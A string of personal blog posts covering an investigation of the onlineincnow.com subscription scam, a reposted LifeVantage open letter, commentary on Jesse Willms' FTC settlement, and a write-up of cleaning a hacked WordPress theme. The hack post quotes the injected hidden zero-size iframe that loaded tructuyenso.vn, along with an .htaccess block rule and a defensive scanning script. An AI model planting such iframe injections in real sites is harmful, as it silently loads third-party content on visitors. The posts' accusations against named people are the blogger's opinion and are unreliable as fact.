Huge parts of the web are off limits to bulk snooping by Corporations and Governments. We are resetting the net!
That Was Epic!
Today, we took back privacy and blocked government surveillance. It’s still not possible to be totally safe on-line. But we have made it harder. Much Harder. A host of well-known internet names have not only pledged support for online freedom, privacy and personal security – they’re actually doing it right now! See below!
For myself, you can find me here for a few weeks. After this time, I will be still operating as a relay, but operating anonymously. There will be a different fingerprint and different ports – currently I’m using fairly standard ports. So why make it easy for governments and corporate snoops? Make it hard. Make it harder. Make bulk snooping a thing of the past.
Well, typing the URL directly takes me to workingfromhome22.com! This is it!
Cunningly, you’ll note that it’s pulled out my home-town as Bournemouth (where I live) with that awful “mom” Americanism! No-one in the UK addresses their mother as mom… I mean, FFS?
The webpage links, containing the disreputably used graphics of Thomson, Reuters, CNBC and NBC Universal all point to http://workinghome22.com/go.php, which is of course in this domain. So let’s click it, shall we?
Well, pctrck.com is trying to load, but not much else.
Reversing then trying to exit workinghome22.com produces a pop-up of dubious functionality! Check the words – there’s no cancel button!
I did however manage to successfully close this page following that. Whew!
Now Back to onlineincnow.com
The previously mentioned http://onlineincnow.com/2/?aff_sub=72 is located in the USA.
So What Is It Up To?
OnlineIncNow.com Whois Record
Good Question! A WHOIS puts the registrant in China with the DNS servers in Russia!
As I mentioned earlier, the similarity of the scamminess of this thing is just like the Google Treasure Chest / Google Money Tree / PWW scams of old.
The site is plastered with the logos of well known businesses to add an air of authenticity to things (just as the original hook sites used The Guardian Newspaper and CBS in the same way) yet at the bottom of the page they disingenuously add:
This site and the products and services offered on this site are not associated, affiliated, endorsed, or sponsored by NBCNEWS, ABC, USA Today, CNN or Fox News, nor have they been reviewed tested or certified by NBCNEWS, ABC, USA Today, CNN or Fox News.
onlineincnow.com T&C Screenshot
Despite all this, it is of course bollox set to deceive. In fact, it now appears that it’s the well known negative option scam, used by Pacific Webworks (PWW) and Jesse Willms to good effect until they were found out.
Let’s see how this pans out, shall we?…..
Check out the T&C page from the tiny link in the page footer – screenshot on the right.
They say that the applicable law is the State of Florida.
You will become a “member” and the key phrases are here:
You must register as a “Member” with Online Income Now to access certain functions of the website. You must provide current, complete and accurate information about yourself (the “Registration Data”) when registering as a Member. You agree that such information is truthful and complete. You agree to maintain and keep your Registration Data current and to update your Registration Data as soon as it changes. You are responsible for maintaining the security of your password. Online Income Now is not liable for any loss that you suffer through the use of your password by others. You agree to notify Online Income Now immediately of any unauthorized use of your account or other breach of security known to you. You also, by becoming a Member, agree to report violations of these Terms and Conditions by others to Online Income Now.
For a limited time only, the cost of this product is $97.00 ( usual price $299.95 ) and every 32 days thereafter you will be billed the member’s only price of $9.95 for the monthly use.
MATERIALS PROVIDED TO Online Income Now OR POSTED AT ANY Online Income Now’s WEB SITE
Online Income Now does not claim ownership of the materials you provide to Online Income Now (including feedback and suggestions) or post, upload, input or submit to any Online Income Now Web Site or its associated services (collectively “Submissions”). However, by posting, uploading, inputting, providing or submitting your Submission you are granting Online Income Now, its affiliated companies and necessary sublicensees, permission to use your Submission in connection with the operation of their Internet businesses including, without limitation, the rights to: copy, distribute, transmit, publicly display, publicly perform, reproduce, edit, translate and reformat your Submission; and to publish your name in connection with your Submission.
You’ll see that “Online Income Now” will:
make you a “member” (of what?)
and you will be regularly billed, (why?)
and that for anything you post, upload etc (wah? whadya mean? Where is this uploading?), “Online Income Now” will take no responsibility for what you do!
…………….which is curious as you don’t know what you’ll be doing and they have invited you to do it in the first place!!!
Now Let’s Click The Link! Follow that Opportunity!
2 Spots Left!
Amazingly (sarcasm alert) there are two “spots” left in my area! This is the page… http://onlineincnow.com/2/index2.php
Michelle Johnson is the “guru” who will tell me everything! So what do I do? I have two options:
Let’s Try Backing Out, Shall We?
Cannot Backout From OnlineIncNow 2
Cannot Backout From OnlineIncNow
Well of course, they won’t let me. It takes two goes to get out and the first one completely takes over the browser! Bad. This is B.A.D.
Ah, well. Finally escaped.
Let’s Try Clicking to the Signup Page, Shall We?
secure.onlineincnow.com Data Entry Screen
I decide on my name, “Jobless Jake” and a random phone number…. The website is now https://secure.onlineincnow.com/2/cc_97.php
What I see is bad, really bad, and any attempt by this pack of jokers at saying they don’t run a negative option scam is now revealed on this sign-up page!
The scam is now revealed for what it is – a negative option scam! Read it carefully….. They expressly say;
By enrolling, you will be charged a one-time fee of $97.00
In teeny-tiny letters, note!
But remember, right back buried in the T&C’s they say;
every 32 days thereafter you will be billed the member’s only price of $9.95 for the monthly use.
This is expressly against the FTC code and laws in most countries. If any extra charges are to be levied for any service or goods, they should be expressly stated on the sign-up page where the customer first enters their financial details.
Gotcha! You Bastards!
Okay, I’ve Had Enough of This. I’m Off!
“Not so fast, young Jobless Jake”, say onlineincnow.com……!
Cannot Backout From OnlineIncNow 3
They’ve an extra 20% off plus an extra bit of webpage-erese! The screenshot says it all, though it wasn’t the end of it. I had one more “Leave Page” option like the earlier one above.
Roll on the FTC. They’ve got to weigh in on these sharks soon.
Paul Myhill’s Open Letter On Facebook
Update on 24 April 2012
Rather than a comment, (which isn’t so taggable and relevant within search engines), here’s Myhill’s open letter (open – geddit? – in the fullest meaning of the word). Text follows below.
OPEN LETTER TO MY DEAR LIFEVANTAGE FAMILY
Needless to say, the company and I are not on good terms right now. Quite frankly, Doug Robinson’s email to the LifeVantage distributors is fraught with error and misrepresentation. In fact, he gave very little attention to me personally on this matter, hardly exchanging a word with me concerning it. He simply didn’t have the time for me.
It is very well documented that the company was founded on a pledge to give shares, and a percentage of profits, to the charitable cause that it helped to start – rescuing orphaned and abandoned children from being abused, exploited, trafficked and enslaved. This was my “Why?” for joining Bill Driscoll in starting LifeVantage in the first place . . . and it is a cause that he graciously took on as his own and championed also. I’m sure he’s getting many hugs in Heaven as a result of the 15,000 children who are free from slavery today because of our work together.
I will be more-than-willing to make public all that documentation, especially since it was all public information to begin with. This charitable pledge was also the basis for which I assigned my invention (not Dr. McCord’s invention!) to LifeVantage. As soon as Bill and I assigned the patent to LifeVantage the pledge was sadly taken out of company materials, almost immediately. I naturally felt quite betrayed. Again, I can provide full documentation supporting this and it can be easily verified in the public record – through company press releases, investor presentation materials, SEC filings, etc. My resignation letter was also a matter of public record and alludes to the fact that this pledge – which was foundational to the company and my very involvement in it – needed to be kept, otherwise it would represent a promise broken to the original founders and all of LifeVantage’s stakeholders. The erasing of the pledge from company materials was the main reason for my departure, which the original Board and transition management team can certainly attest to. I was quite the thorn in their sides, constantly verbalizing the need to keep the pledge. As such, there is no disputing the existence of the original commitment. It’s simply undeniable.
I have been quite clear in my communications with LifeVantage management that the company still owes the charity now known as Traffic Jam 100,000 shares as part of its original pledge to match the Founders’ donation of shares to that same charitable vehicle. This amount was supposed to match Bill Driscoll’s gracious donation of 100,000 shares that came in a couple of months late. I’m sure if he were alive today he’d be greatly disappointed that the company never followed through on that commitment . . . and other commitments. Bill and I had our differences, but I also owe it to him as my brother-in-arms to get his shares matched, as he fully expected would be done when he made his generous gift in the first place. I owe it to his memory and legacy. And I owe it to his family – to see more children rescued because of his gift and defense of the pledge.
Despite the implication made in Doug’s letter, I never approached the company to ask anything for myself. In fact, it was David Brown who suggested that I become a “Goodwill Ambassador” for the company with a job role that would give me a greater platform to share the “correct” company history and bring attention to the fine work of the Traffic Jam Campaign. It was through that process that compensation (as with any job) was sought to channel to Traffic Jam. I have quite a few emails that show that this compensation was for the purpose of supporting the work of Traffic Jam. I’m on record multiple times stating that I gave everything away . . . and would give it away again.
It is with great sadness that I write this on the eve of my Birthday – not exactly the “gift” I was hoping for . . . or hoping to give. Since 2008, I have been pleading with the company to correct its marketing materials – to reflect that Joe is not the “Inventor” or “Creator” or “Scientist behind” Protandim; that Protandim wasn’t “developed after 40 years of research;” and that it didn’t consist of a “laundry list” of 40 ingredients that Joe whittled down to the current formula. This is all simply untrue. I’m sure the company will try to put some sort of further spin on this now and try to convince people otherwise, but the truth is the truth and will always come out in the end. Darkness can’t hide from the light.
The CORE botanical formula I forwarded to Joe included the current five botanicals, plus one additional one – all in the EXACT same proportions/weights as the current formula (all 1/3 of the original to get it into one pill), but with Milk Thistle subsequently bumped up at my suggestion. The other ingredients were part of an “all-in-one” (multi-formula) addition to that CORE botanical formula that I developed. Given such indisputable facts (and that the initial patent was filed one month before we even met Joe), how am I NOT the creator? How is Joe THE creator? The simple email record, and even a letter from Joe himself, clearly show that the current company communications are downright false and misleading . . . and, in the eyes of many, perpetuate an ongoing fraud – one that the SEC and FTC should be made aware of.
I initially stated that “nobody lied,” desiring to give this current management team the benefit of the doubt and chalking it to human error and the discontinuity of company management in general. But then, month after month went by with the same erroneous materials still being widely distributed by the company, despite their own admission to me that Joe isn’t the creator. These same materials are on the company website TODAY. I just don’t get how a company can keep doing that, with full knowledge that the materials are sending the wrong message to current and new distributors. Many times I wrote emails (which I’d be happy to share with you) and each time nothing was done to take down the offending materials.
I’ll be glad to once again share that whole “Protandim Development History” with you, which is backed up by meticulous documentation, the full email record, plus personal notes and commentaries. It spanned over 20 blog entries. I’m an “open book.” I had nothing to hide. I shared it all.
I’m sure, though, that if I were to re-post Protandim’s development history, the company would claim that I was then “giving away company secrets” and would once again try to silence the true history of the product’s creation – MY creation of Protandim – that occurred for almost ten months before I even met Joe. The reality is that the company misrepresentations have gone on for so long now that they have no choice but to try to silence the truth. Just you wait and see. I can almost hear the “cease and desist” letter being typed up right now. And I can almost picture the new “watered-down” version of the history that the company will now come up with.
Doug mentioned in his letter that I found the company response unacceptable. Well, one of those unacceptable conditions was that I sign a new set of releases (to silence me telling the true Protandim story again) and that I pull down my “LifeVantage / Protandim Founder’s Page” on Facebook which, of course, would be in addition to my blog that was already pulled down. Do you see the common theme here? Silence. Silence. And more Silence. I’m a high-justice person who stands for truth and integrity and, despite the company trying to buy that silence by offering for Traffic Jam to be featured at convention, I told them that I couldn’t in good conscience do that. I’m not signing away my voice. My “Founder’s Page” stays. My voice stays. And my appeal to get the company to meet its commitments . . . stays.
Do you want a company of integrity? Well, then, don’t let them silence the truth any more. Protandim wasn’t an “idea” that Bill and I took to Joe. It was a full formula that even Joe stated in a letter was almost at its “final embodiment.” And the company’s charitable pledges to Traffic Jam wasn’t an “idea” that I just came up with. It was represented in multiple press releases and SEC filings and collateral materials. If you don’t believe me, go to EDGAR and check yourself for at least the SEC part of it.
Ever wonder why the company took down all the archived press releases? Because it backs up what I’m saying and what I’ve been asking, not for myself, but on behalf of trafficked and enslaved children.
Given the erroneous wording in Doug’s email, I can only assume now that the company has chosen the issue of the 100,000 shares to try to discredit me – making it sound like I’ve been making selfish and unreasonable demands of the company – while at the same time trying to discredit the true history of Protandim’s development. Doug, of course, fails to mention in his email that the “great deal of material” that I posted on the Internet concerning “my view” of that development was 1.) Taken down by me as a sign of “good faith” and 2.) Was only posted in the first place after I reached out to the company multiple times beforehand – with no response.
I’m not sure how Doug can call it “my view” of Protandim’s development anyway, considering that it included hundreds of emails (that were copied or sent to dozens upon dozens of people) as well as a number of other source documents that were widely circulated. It’s not just “my view,” as demonstrated by the substantiated, well-documented evidence. Of course, if the company has its way, you probably won’t see any of that document and you’ll just have to accept Doug’s words that it was simply “my view” of events. Where was Doug during the development of Protandim? Who is he to challenge the clear evidence? Can he not see the patent was initially filed a full month before Joe even came into the picture? Does he not see whose name is on the patent?
For months, I’ve taken steps of “good faith” and have expected the company to do the same – to act in “good faith” to take down the erroneous marketing materials that were propagating that Joe was the inventor/creator of Protandim. Sadly, the company never reciprocated. The 100,000 share issue, unfortunately, has now become the easy point of contention that allows LifeVantage to not have to give credit to me for my invention. By making it so public and contentious, LifeVantage now has a convenient excuse to not have to include Bill and me in our rightful place in the company history. Something that should have been celebrated can now be easily swept under the rug because I’m the “bad guy” with “unreasonable” expectations who asked the company to honor its commitments. It now allows them to feel better about themselves somehow – for so long being negligent in getting the real story about Protandim’s development out there; for so long casting me in a “false light” by commission and omission; for so long keeping up the erroneous materials to the point of malice and great hurt.
Company of integrity, Doug says? How about keeping its original promises to match the founders’ shares to rescue children? How about keeping its original promises to give 10% of pre-tax net profits away for children and related humanitarian causes? How about filing an 8-K correction notice with the SEC every time the erroneous message of Joe being the “creator” went out? How about the promise to correct the development history while at the same time keeping up the offending materials that lead people to believe Joe was the inventor? How about David’s promise to “make it happen” for me to have a “Goodwill Ambassador” role with the company, to help further the purposes of Traffic Jam? How about the company’s constant encouragement for distributors to use the copyrighted material of ABC News for commercial purposes? How about all those big distributors who came over with down-lines allegedly “stolen” from Zrii? How about ALL the mentions of diseases when it’s clearly not permitted in the marketing of a supplement?
Integrity? Company of integrity? Actions speak louder than words.
This is a very sad day for me folks. The “petition” that Doug mentioned in his letter was merely me throwing up my arms in bewilderment and wondering why on earth the Board wasn’t fulfilling the matching pledge with a measly 100,000 shares when the evidence was so clear that 100,000 shares were missing (Believe me, I was asking for these shares long before the recent run-up in price). Even a math flunkey could see that the numbers didn’t add up and 100,000 shares were still owed. Instead of bringing the match to completion, with an amount of shares that pales in comparison to the fat stock options the executives are getting, they chose to make this big issue out of it. It could have been a cause for celebration. Instead, the company has chosen to create yet another public relations nightmare. I didn’t ask for that. They did it. And I’m baffled by it.
I started off with 5 million shares. Why on earth would I make all this fuss about 100,000 shares if it were not true? I’m a man of principle and the principle-of-the-matter is the shares are still owed. Gosh, by their reaction, you’d think I asked for the moon.
I merely responded by saying that I would put out the public information and ask distributors to let their voices be heard – for integrity and common sense. But somehow that’s now something portrayed as me being devious and destructive. Hello? Why would I try to destroy the stock of the company I’m trying to get shares from? Hello?
Conversely, I don’t believe the LifeVantage Board has acted in its fiduciary duty in this matter. I believe they are acting in a destructive manner. Why on earth would they bring about such a disruptive episode in the midst of such growth and promise? The missing shares are soooooooo obvious that they are missing from the match. I gave 200,000 shares. Bill gave 100,000 shares. The company gave 200,000 (matching mine) and, hello again, Bill’s shares didn’t get matched. 100,000 shares missing. You don’t need a mathematics degree to figure that one out. Why would the Board put so much at risk – the airing out of this laundry – instead of just issuing the shares to help rescue kids?! And celebrating it!
. . . Unless, of course, they were needing something to make me look “bad” or “unreasonable” so they don’t feel so bad about the incorrect company communications about who invented the product. And to release themselves from an obligation to correct that history in a way that celebrates Bill’s and my involvement.
. . . Now they can just quietly remove the “creator” tag from Joe and hope that nobody notices. Just like they did when they removed the “inventor” tag from him.
Doug’s letter concludes by asking distributors to not get involved in anything that “disparages” the company. Wow. I asked the company to honor its commitment with a measly 100,000 shares to stop 11 year-olds from getting raped 20 times per day; to stop 7 year-olds from having to shoot their parents before being forcibly conscripted into a child militia. Now, if any distributor goes along with supporting what is clearly in the public record, and honoring their own conscience to see the pledge fulfilled for children such as these, they are in violation of their distributor’s agreement. Seriously?
Looks like the strong arm of silence rearing up again.
My apologies for rambling on in this open letter. Obviously I’m a passionate person – the same passion that brought Protandim into being in the first place. And, obviously, I’m quite upset right now – not just by these events, but how they’ve now been represented in Doug’s email.
Unfortunately, it’s the distributors and the children who lose out because of the Board’s baffling conclusion and Doug’s irrational choice to send out his email. Quite reckless, if you ask me. Certainly not acting in the best interests of the shareholders. They turned a public relations celebration into a public relations nightmare.
I apologize to all of you that it has come to this. It certainly wasn’t my intention.
I want you all to know that I love you all and do indeed wish you the best. I will STILL use my “Founder’s Page” on Facebook as a place of encouragement and, given this recent turn of events, as a place of clarity and truth.
So there you have it. Since this time, Myhill has been sat on by Lifevantage (as it turns out a kind of double-blackmail) and then stated that the shares were the thing to buy. Following this, Lifevantage have made public pronouncements about their charitable donations to Myhill’s charitable organisation(s) and there’s now, apparently, a kind of Machiavellian sweetness and light between them.
But whatever: the business is still a snake-oil pyramid scheme founded on flawed and discredited “science” and promoted by MLM-hopping get-rich-quick wide-boys. For more on these recent developments and a fuller history of investigations into the topic, see a few of LazyMan’s postings here:
…….I won’t steal any more of Lazyman’s thunder and there’s much, much more on his site. But from top to bottom, the volunteers and employees of all the charities financed by Myhill and/or Lifevantage should examine their hearts and ask themselves;
What value is there to a charity when it’s financed from deception?
So what if Myhill has had his photo taken with Elton John or whoever.
So what if Myhill plugs;
Paul Myhill Entertainer Plugs
“Meetings getting scheduled with Lady Gaga, Justin Timberlake, Justin Bieber, Slash, Myles Kennedy, and many more. The TRAFFIC JAM Campaign (Stop Child Trafficking & Slavery) will be rocking this summer!”
Our Prime Ministers and Presidents are often photographed with the pariahs of the world. Elton is one of the world’s biggest self-publicists and spend-thrifts. So is Gaga. So, so what? There is no validation there.
It’s still a charity founded on deception. It may have good aims. It may be correctly financed and regulated – though Vogel has shed great doubts over this (See here, here, here, here and here). But it is financed by a pyramid scheme based MLM using a product with no proven benefit as the bait on the hook.
Instead of being stripped completely of his ill-gotten gains and being chucked in the slammer for a few years, he has reached a settlement whereby no admission of guilt has been made!
This is exactly what I suggested would happen, because the self-proclaimed philanthropist Jesse will do anything, absolutely anything, to stay in business.
To me this isn’t true victory.
He’s not been punished by the law which explains the lingering smell I have, possibly due to his key lawyers having previously worked at the FTC. Maybe it is the old boy network? Whatever.
The millions (yes, millions the FTC say) of people scammed may be temporarily amazed at the $359-million judgement, but seeing as how the original complaint was for over $450m they’ll soon realise that he’s got off with $100m! However it’s worded, Willms has weaselled out of any admission of guilt, which means he’s still in business.
What cunning plans could now be afoot, with $100m to back them up, they’ll wonder? It’s like The Return of Fu Manchu.
Almost 4 Million Questions
Willms’ Blog Release – notice how he promotes the $25k ‘gift’, but not his $359m settlement?
Like me, the millions scammed by him will be questioning how he isn’t, right now, being butt-plugged in Huntsville, instead of having 7 days to calmly surrender his bank accounts to prove that he can stump up the $359m negotiated, meanwhile making gratuitous comments about better business practices in future whilst still singing the praises of his $1000 philanthropic gestures.
True, Willms et al have to hand over all their money and have promised as much under sufferance of perjury.
True, they all have to notify the FTC of their whereabouts for the next 20 years and all their business proceeds. They have to keep compliance records for 5 years.
True, Willms must tell the FTC his jobs, phone numbers, businesses in which he’s involved etc
True, Willms et al have 180 days to hand over all details of all their businesses and contacts within those businesses.
True, Willms for the next five years must give a copy of the FTC order (the pdf attached) to each person he does business with and that they have 30 days to sign and return it to the FTC.
True for all of that, but, Willms can still do business and who knows if any of his victims will get recompensed. A lot of the order’s wording is to ensure that the US & Canadian Inland Revenue get their taxes from Willms et al for the last three years. What about the little people?
This article guesses that victims won’t see any of the cash. My guess is that only those people that actually complained to the FTC will get cash, which is why it’s so important to complain, as I’ve suggested for years.
This article thinks that he’s had to hand over everything (though I can’t see how they justify that, given what we know about business secrecy in Nicosia, Cyprus), yet it also points out that the bans that Willms has had to acquiesce to only apply to the USA! That is, there’s nothing at all saying Willms can’t set up anywhere else, like Korea say, and hammer the world from there!
MSNBC opinionate that Jesse Willms will need to look for a new line of work…..
I, of course, beg to differ, because:
He settled with Microsoft, yet carried on trading as usual.
He settled with Symantec, yet carried on trading as usual.
He settled with Oprah Winfrey, yet carried on trading as usual.
He settled with Dr Oz, yet carried on trading as usual.
He settled with Google, yet carried on trading as usual.
Now he has settled with the FTC. I’d be amazed (yet obviously pleased) if he changed the patterns of a lifetime. Only time will tell.
On top of this, Willms himself states on his blog entry (see screenshot above);
We are working to resolve issues relating to past marketing practices for products that our company no longer sells. Through this process, we have taken steps to assure(sic) that our business practices are in full compliance with the law. We are excited by the opportunity to continue giving customers access to a variety of products and services at significant savings. – n.b. the emphasis is mine.
…..which looks to me that it’s more web business, not a change in business type.
It’s a victory, but not the one the whole world wants. It all leaves a bad, lingering, smell…..
Circle Media Bids Limited, also d.b.a. SwipeBids.com, SwipeAuctions.com, and SellofAuctions.com;
Coastwest Holdings Limited;
Farend Services Ltd;
JDW Media, LLC;
Net Soft Media, LLC, also d.b.a. SwipeBids.com;
Sphere Media, LLC, also d.b.a. SwipeBids.com and SwipeAuctions.com;
I’ve listed these so that they appear in search engines and so that people realise the lengths of obfuscation that Willms has used in his activities.
I say Willms, because he is recognised in the judgement as the prime mover in the scams. He has been pinched for hundreds of millions – the others have been collared for a few tens of thousands at most each, some, for nothing, because (how embarrassing is that for them?), they have nothing – yes really!
How annoying for the two Gravers that their payments are about the same as young Jesse Willms’ fish tank! ($30,000 in 2010 he paid for it)
I wonder how the Children’s Hospital Boston and the Gulf Coast Restoration Fund both realise that they’ve got less from philanthropic Jesse than he’s spent on his fish tank? ($25k each) I wonder how they feel now, knowing that this money was stolen from ordinary consumers, people like themselves?
A few days ago I got hacked. I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.
This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess! The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website. This is how:
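<Limit GET POST>
# "order allow,deny" evaluates deny last, so the deny line overrides "allow from all"
order allow,deny
deny from 126.96.36.199/8
allow from all
</Limit>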
However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….
A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager. (In the end, this was my failing and I will not rely on the thing again!)
A search through my database also turned up zero.
TCPView is a download from Sysinternals.com (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere. This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area), fired up in Firefox, as many as 7 connections were simultaneously made to 188.8.131.52…… This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.
Even when closed by TCPView, the connections would immediately start up again to the same IP address, 184.108.40.206 (manually closing strangelyperfect.tv stopped the connections).
I had of course previously changed my FTP, MySQL database and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer! On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)
Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom. This is the code as it was when I checked:
<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
This was then easily traced to the footer.php file in my theme, Suffusion.
It was simply stripped out and the website then worked fine….. but to be sure, I have downloaded then checked the footer file in a fresh theme download to be sure – it’s clean! I then uploaded a whole clean Suffusion theme in its entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.
A recheck on Sucuri shows my website to be okay now. See screendump below. I’ll be using Sucuri a lot more!
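The two checks that finally worked in this post (spotting the hidden off-site iframe, and comparing the installed theme against a fresh download) can be scripted. The following is an added example, not code from the original post; the directory layout, the theme file contents and the stray file `tmp_upload.php` are constructed for illustration, and the injected snippet is the one quoted above with some iframe attributes shortened.

```python
import hashlib
import tempfile
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

OWN_HOST = "strangelyperfect.tv"  # the site named in the post

# Snippet found at the bottom of footer.php (from the post, attributes shortened).
INJECTED = (
    '<a href="http://tructuyenso.vn" title="Quang cao truc tuyen">Quang cao truc tuyen</a>\n'
    '<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" '
    'nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>\n'
)


class IframeAudit(HTMLParser):
    """Record every iframe that is zero-sized or loads from another host."""

    def __init__(self, own_host):
        super().__init__(convert_charrefs=True)
        self.own_host = own_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        # HTMLParser lowercases attribute names; valueless ones (nosize) arrive as None.
        attr = {name: (value or "").strip() for name, value in attrs}
        host = (urlparse(attr.get("src", "")).hostname or "").lower()
        off_site = bool(host) and host != self.own_host \
            and not host.endswith("." + self.own_host)
        zero_size = attr.get("width") in ("0", "0px") or attr.get("height") in ("0", "0px")
        if off_site or zero_size:
            self.findings.append({"src": attr.get("src", ""), "host": host,
                                  "off_site": off_site, "zero_size": zero_size})


def scan_file(path, own_host=OWN_HOST):
    """Return suspicious iframes found in one theme file (PHP blocks are skipped over)."""
    parser = IframeAudit(own_host)
    parser.feed(Path(path).read_text(encoding="utf-8", errors="replace"))
    parser.close()
    return parser.findings


def sha256_tree(root):
    """Map each file's path (relative to root) to the SHA-256 of its contents."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare_with_clean(installed, clean):
    """List files that differ from, were added to, or are missing from the clean copy."""
    have, want = sha256_tree(installed), sha256_tree(clean)
    return {
        "modified": sorted(f for f in have if f in want and have[f] != want[f]),
        "added": sorted(f for f in have if f not in want),
        "missing": sorted(f for f in want if f not in have),
    }


def audit_theme(installed, clean, own_host=OWN_HOST):
    """Diff the installed theme against a clean download, then scan what changed."""
    diff = compare_with_clean(installed, clean)
    frames = {}
    for rel in diff["modified"] + diff["added"]:
        hits = scan_file(Path(installed) / rel, own_host)
        if hits:
            frames[rel] = hits
    return diff, frames


def demo():
    """Build a constructed clean theme and a tampered copy, then audit them."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        footer = "<div id='footer'><?php wp_footer(); ?></div>\n</body>\n</html>\n"
        for root in (clean, live):
            root.mkdir()
            (root / "footer.php").write_text(footer, encoding="utf-8")
            (root / "style.css").write_text("body { margin: 0; }\n", encoding="utf-8")
        # Tamper with the live copy as the post describes: snippet at the very bottom.
        (live / "footer.php").write_text(footer + INJECTED, encoding="utf-8")
        (live / "tmp_upload.php").write_text("<?php // constructed stray file ?>\n",
                                             encoding="utf-8")
        return audit_theme(live, clean)


if __name__ == "__main__":
    diff, frames = demo()
    print("changed files:", diff)
    for rel, hits in frames.items():
        for hit in hits:
            print(f"{rel}: iframe -> {hit['src']} (zero_size={hit['zero_size']})")
```

Hash comparison catches files that a string search would miss, and the iframe scan explains why a modified file matters; anything listed under "added" still needs a manual look.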